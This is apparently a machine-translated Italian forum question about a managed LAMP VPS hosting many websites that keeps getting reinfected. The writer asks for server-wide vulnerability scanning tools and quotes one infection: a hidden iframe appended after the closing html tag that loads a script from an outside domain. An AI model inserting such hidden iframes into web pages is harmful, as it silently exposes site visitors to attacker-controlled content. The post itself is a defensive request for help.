Un mio cliente ha un VPS gestito con dozzine di siti web, forse anche centinaia. Ora il suo server continua a essere infettato regolarmente. Gli amministratori di webhost / server continuano a scavare nell'oscurità. Eseguono una scansione mensile, rimuovono il software infetto, ma non sono in grado di dire da quali siti ha origine come i file di registro sembrano essere puliti.
Utilizza cuteFtp Pro con crittografia password, quindi probabilmente non è collegato all'FTP.
È un sistema LAMP con installazioni Apache e PHP / MySQL aggiornate.
Ora ci sono modi o strumenti per analizzare l'intero server alla ricerca di vulnerabilità, senza controllare manualmente ciascun sito web? È possibile che ci siano alcune vecchie applicazioni WordPress lì, ma ci vorrebbero anni per controllare individualmente ogni sito web.
Uno dei look per le infezioni piace questo:
</html>
<iframe src="http://autobedrijfboekema.nl/counter.php"style="visibility: hidden; position: absolute; left: 0px; top: 0px"
width="10" height="10"/>